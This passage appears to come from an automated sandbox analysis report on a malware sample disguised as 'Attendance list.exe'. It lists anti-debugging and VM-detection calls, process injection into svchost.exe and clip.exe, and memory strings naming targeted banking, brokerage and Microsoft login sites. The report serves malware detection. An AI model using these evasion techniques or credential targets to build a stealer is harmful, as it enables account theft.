            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00923A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00923A2B
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00923D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00923D4E
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0092BF27
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0265BC20 FindFirstFileW,FindNextFileW,FindClose,4_2_0265BC20
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008C4AFE
            Source: 23802I71.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 23802I71.4.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 23802I71.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 23802I71.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 23802I71.4.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 23802I71.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 23802I71.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 23802I71.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 23802I71.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 23802I71.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 23802I71.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 23802I71.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 23802I71.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 23802I71.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 23802I71.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4462401508.0000000000E4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 23802I71.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 23802I71.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 23802I71.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 23802I71.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: firefox.exe, 00000006.00000002.2468962186.000002391DAAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
            Source: 23802I71.4.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 23802I71.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 23802I71.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 23802I71.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 23802I71.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 23802I71.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: clip.exe, 00000004.00000002.4461785541.0000000002766000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
            Source: 23802I71.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 23802I71.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 23802I71.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 23802I71.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 23802I71.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 23802I71.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\Attendance list.exeAPI call chain: ExitProcess graph end nodegraph_0-99182
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004173E3 LdrLoadDll,2_2_004173E3
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_009341FD BlockInput,0_2_009341FD
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008C3B4C
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008F5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_008F5CCC
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0093C304 LoadLibraryA,GetProcAddress,0_2_0093C304
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00E834D0 mov eax, dword ptr fs:[00000030h]0_2_00E834D0
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00E83470 mov eax, dword ptr fs:[00000030h]0_2_00E83470
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00E81E70 mov eax, dword ptr fs:[00000030h]0_2_00E81E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D437C mov eax, dword ptr fs:[00000030h]2_2_036D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h]2_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h]2_2_036D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370634F mov eax, dword ptr fs:[00000030h]2_2_0370634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h]2_2_0362C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h]2_2_03650310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036663FF mov eax, dword ptr fs:[00000030h]2_2_036663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h]2_2_036EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h]2_2_036B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362826B mov eax, dword ptr fs:[00000030h]2_2_0362826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h]2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h]2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370625D mov eax, dword ptr fs:[00000030h]2_2_0370625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h]2_2_0362A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636259 mov eax, dword ptr fs:[00000030h]2_2_03636259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362823B mov eax, dword ptr fs:[00000030h]2_2_0362823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h]2_2_037062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h]2_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h]2_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660124 mov eax, dword ptr fs:[00000030h]2_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]2_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]2_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]2_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]2_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]2_2_0365C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]2_2_03632050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]2_2_036B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]2_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]2_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]2_2_036C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]2_2_036B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
